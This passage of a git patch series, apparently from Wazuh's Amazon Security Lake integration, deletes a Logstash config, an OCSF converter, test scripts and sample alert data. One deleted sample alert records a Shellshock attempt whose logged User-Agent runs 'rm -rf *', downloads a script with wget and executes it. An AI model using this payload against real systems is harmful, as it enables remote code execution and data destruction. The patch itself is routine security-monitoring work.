"status_id" : 99, - "type_uid" : 200101 - }, - "mappings": - { - "count" : "rule.firedtimes", - "finding_info.analytic.category" : "rule.groups", - "finding_info.analytic.name" : "decoder.name", - "finding_info.analytic.uid" : "rule.id", - 
"finding_info.attacks.tactic" : "rule.mitre.tactic", - "finding_info.attacks.technique" : "rule.mitre.technique", - "finding_info.title" : "rule.description", - "finding_info.types" : "input.type", - "finding_info.uid" : "id", - "message" : "rule.description", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" - } - } -} From 5cb2c38245f344b5ca9f4d4448e690edcf04eea7 Mon Sep 17 00:00:00 2001 From: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> Date: Wed, 28 Feb 2024 09:17:43 -0300 Subject: [PATCH 76/77] Delete integrations/amazon-security-lake/logstash/pipe-output.conf Signed-off-by: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> --- .../logstash/pipe-output.conf | 35 ------------------- 1 file changed, 35 deletions(-) delete mode 100644 integrations/amazon-security-lake/logstash/pipe-output.conf diff --git a/integrations/amazon-security-lake/logstash/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf deleted file mode 100644 index 4f64eb5a46a54..0000000000000 --- a/integrations/amazon-security-lake/logstash/pipe-output.conf +++ /dev/null @@ -1,35 +0,0 @@ -input { - opensearch { - hosts => ["127.0.0.1:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" - index => "wazuh-alerts-4.x-*" - ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" - query => '{ - "query": { - "range": { - "@timestamp": { - "gt": "now-1m" - } - } - } - }' - target => "_source" - schedule => "* * * * *" - } -} - -output { - - stdout { codec => rubydebug } - - pipe - { - id => "securityLake" - message_format => "%{_source}" - ttl => "10" - command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" - } - -} From 995036959eb08900c1759efeb3fdbd41c0412a5f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Mon, 4 Mar 2024 12:06:17 +0100 Subject: [PATCH 77/77] Remove old files --- .../amazon-security-lake/ocsf/__init__.py | 2 - .../amazon-security-lake/ocsf/converter.py | 90 ---------- .../amazon-security-lake/ocsf/test.py | 15 -- .../ocsf/wazuh-event.sample.json | 90 ---------- .../sl_integration_test.json | 162 ------------------ integrations/docker/amazon-security-lake.yml | 2 +- 6 files changed, 1 insertion(+), 360 deletions(-) delete mode 100644 integrations/amazon-security-lake/ocsf/__init__.py delete mode 100644 integrations/amazon-security-lake/ocsf/converter.py delete mode 100644 integrations/amazon-security-lake/ocsf/test.py delete mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json delete mode 100644 integrations/amazon-security-lake/sl_integration_test.json diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py deleted file mode 100644 index 777a7d20549b5..0000000000000 --- a/integrations/amazon-security-lake/ocsf/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -# Python module placeholder -# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py deleted file mode 100644 index 161012475cb14..0000000000000 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ /dev/null 
@@ -1,90 +0,0 @@
-#!/usr/bin/python3
-
-# event comes from Filebeat
-#event = {}
-#print(event)
-
-def normalize(level: int) -> int:
- """
- Normalizes rule level into the 0-6 range, required by OCSF.
- """
- # TODO normalization
- return level
-
-
-def join(iterable, separator=","):
- return (separator.join(iterable))
-
-
-def convert(event: dict) -> dict:
- """
- Converts Wazuh events to OCSF's Detecting Finding (2004) class.
- """
- ocsf_class_template = \
- {
- "activity_id": 1,
- "category_name": "Findings",
- "category_uid": 2,
- "class_name": "Detection Finding",
- "class_uid": 2004,
- #"count": event["_source"]["rule"]["firedtimes"],
- "message": event["_source"]["rule"]["description"],
- "finding_info": {
- "analytic": {
- "category": join(event["_source"]["rule"]["groups"]),
- #"name": event["_source"]["decoder"]["name"],
- "type_id": 1,
- "uid": event["_source"]["rule"]["id"],
- },
- "attacks": {
- "tactic": {
- #"name": join(event["_source"]["rule"]["mitre"]["tactic"]),
- "dummy": True
- },
- "technique": {
- #"name": join(event["_source"]["rule"]["mitre"]["technique"]),
- #"uid": join(event["_source"]["rule"]["mitre"]["id"]),
- "dummy": True
- },
- "version": "v13.1"
- },
- "title": event["_source"]["rule"]["description"],
- "types": [
- #event["_source"]["input"]["type"]
- 0
- ],
- "uid": event["_source"]['id']
- },
- "metadata": {
- "log_name": "Security events",
- "log_provider": "Wazuh",
- "product": {
- "name": "Wazuh",
- "lang": "en",
- "vendor_name": "Wazuh, Inc,."
- },
- "version": "1.1.0",
- },
- #"raw_data": event["_source"]["full_log"],
- "resources": [
- {
- "name": event["_source"]["agent"]["name"],
- "uid": event["_source"]["agent"]["id"]
- },
- ],
- "risk_score": event["_source"]["rule"]["level"],
- "severity_id": normalize(event["_source"]["rule"]["level"]),
- "status_id": 99,
- "time": event["_source"]["timestamp"],
- "type_uid": 200401,
- "unmapped": {
- "data_sources": [
- #event["_source"]["_index"],
- event["_source"]["location"],
- event["_source"]["manager"]["name"]
- ],
- #"nist": event["_source"]["rule"]["nist_800_53"], # Array
- }
- }
-
- return ocsf_class_template
diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py
deleted file mode 100644
index e7d947848b067..0000000000000
--- a/integrations/amazon-security-lake/ocsf/test.py
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/usr/bin/python
-
-from converter import convert
-import json
-
-converted_event = {}
-with open("wazuh-event.sample.json", "r") as fd:
- sample_event = json.load(fd)
- # print(json.dumps(sample_event, indent=4))
- converted_event = convert(sample_event)
-
-if converted_event:
- with open("wazuh-event.ocsf.json", "w") as fd:
- json.dump(converted_event, fd)
- print("Done")
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json
deleted file mode 100644
index 3f35697a9fe36..0000000000000
--- a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json
+++ /dev/null
@@ -1,90 +0,0 @@
-{
- "_index": "wazuh-alerts-4.x-2024.02.08",
- "_id": "yBMliY0Bt8FzffO0BOIu",
- "_version": 1,
- "_score": null,
- "_source": {
- "input": {
- "type": "log"
- },
- "agent": {
- "name": "redacted.com",
- "id": "000"
- },
- "manager": {
- "name": "redacted.com"
- },
- "data": {
- "protocol": "GET",
- "srcip": "000.111.222.10",
- "id": "404",
- "url": "/cgi-bin/jarrewrite.sh"
- },
- "rule": {
- "firedtimes": 1,
- "mail": false,
- "level": 6,
- "pci_dss": [
- "11.4"
- ],
- "tsc": [
- "CC6.1",
- "CC6.8",
- "CC7.2",
- "CC7.3"
- ],
- "description": "Shellshock attack attempt",
- "groups": [
- "web",
- "accesslog",
- "attack"
- ],
- "mitre": {
- "technique": [
- "Exploitation for Privilege Escalation",
- "Exploit Public-Facing Application"
- ],
- "id": [
- "T1068",
- "T1190"
- ],
- "tactic": [
- "Privilege Escalation",
- "Initial Access"
- ]
- },
- "id": "31166",
- "nist_800_53": [
- "SI.4"
- ],
- "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",
- "gdpr": [
- "IV_35.7.d"
- ]
- },
- "location": "/var/log/nginx/access.log",
- "decoder": {
- "name": "web-accesslog"
- },
- "id": "1707402914.872885",
- "GeoLocation": {
- "city_name": "Amsterdam",
- "country_name": "Netherlands",
- "region_name": "North Holland",
- "location": {
- "lon": 4.9087,
- "lat": 52.3534
- }
- },
- "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"",
- "timestamp": "2024-02-08T11:35:14.334-0300"
- },
- "fields": {
- "timestamp": [
- "2024-02-08T14:35:14.334Z"
- ]
- },
- "sort": [
- 1707402914334
- ]
-}
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/sl_integration_test.json b/integrations/amazon-security-lake/sl_integration_test.json
deleted file mode 100644
index 684f9820c5679..0000000000000
--- a/integrations/amazon-security-lake/sl_integration_test.json
+++ /dev/null
@@ -1,162 +0,0 @@ -{"@version":"1","_source":{"manager":{"name":"ubuntu2204"},"decoder":{"name":"json"},"rule":{"firedtimes":3,"level":3,"tsc":["CC7.1","CC7.2"],"description":"The CVE-2007-4559 that affected python3.10 was solved due to a package removal/update or a system upgrade","groups":["vulnerability-detector"],"id":"23502","mail":false,"pci_dss":["11.2.1","11.2.3"],"gdpr":["IV_35.7.d"]},"location":"vulnerability-detector","timestamp":"2024-02-15T16:05:11.486-0300","id":"1708023911.181468","@timestamp":"2024-02-15T19:05:11.486Z","agent":{"id":"000","ip":"127.0.0.1","name":"localhost"},"input":{"type":"log"},"data":{"vulnerability":{"severity":"Medium","cvss":{"cvss2":{"base_score":"6.800000"}},"type":"Packages","status":"Solved","title":"CVE-2007-4559 affecting python3.10 was solved","package":{"architecture":"amd64","version":"3.10.6-1~22.04.2ubuntu1","name":"python3.10"},"enumeration":"CVE","updated":"2023-09-17T09:15:07Z","published":"2007-08-28T01:17:00Z","reference":"http://secunia.com/advisories/26623, http://www.vupen.com/english/advisories/2007/3022, http://mail.python.org/pipermail/python-dev/2007-August/074292.html, https://bugzilla.redhat.com/show_bug.cgi?id=263261, http://mail.python.org/pipermail/python-dev/2007-August/074290.html, https://security.gentoo.org/glsa/202309-06","cve":"CVE-2007-4559"}}},"@timestamp":"2024-02-15T19:06:00.230246531Z"} -{"@version":"1","_source":{"manager":{"name":"ubuntu2204"},"decoder":{"name":"json"},"rule":{"firedtimes":3,"level":3,"tsc":["CC7.1","CC7.2"],"description":"The CVE-2007-4559 that affected python3.10 was solved due to a package removal/update or a system 
upgrade","groups":["vulnerability-detector"],"id":"23502","mail":false,"pci_dss":["11.2.1","11.2.3"],"gdpr":["IV_35.7.d"]},"location":"vulnerability-detector","timestamp":"2024-02-15T16:05:11.486-0300","id":"1708023911.181468","@timestamp":"2024-02-15T19:05:11.486Z","agent":{"id":"000","ip":"127.0.0.1","name":"localhost"},"input":{"type":"log"},"data":{"vulnerability":{"severity":"Medium","cvss":{"cvss2":{"base_score":"6.800000"}},"type":"Packages","status":"Solved","title":"CVE-2007-4559 affecting python3.10 was solved","package":{"architecture":"amd64","version":"3.10.6-1~22.04.2ubuntu1","name":"python3.10"},"enumeration":"CVE","updated":"2023-09-17T09:15:07Z","published":"2007-08-28T01:17:00Z","reference":"http://secunia.com/advisories/26623, http://www.vupen.com/english/advisories/2007/3022, http://mail.python.org/pipermail/python-dev/2007-August/074292.html, https://bugzilla.redhat.com/show_bug.cgi?id=263261, http://mail.python.org/pipermail/python-dev/2007-August/074290.html, https://security.gentoo.org/glsa/202309-06","cve":"CVE-2007-4559"}}},"@timestamp":"2024-02-15T19:06:00.230246531Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA 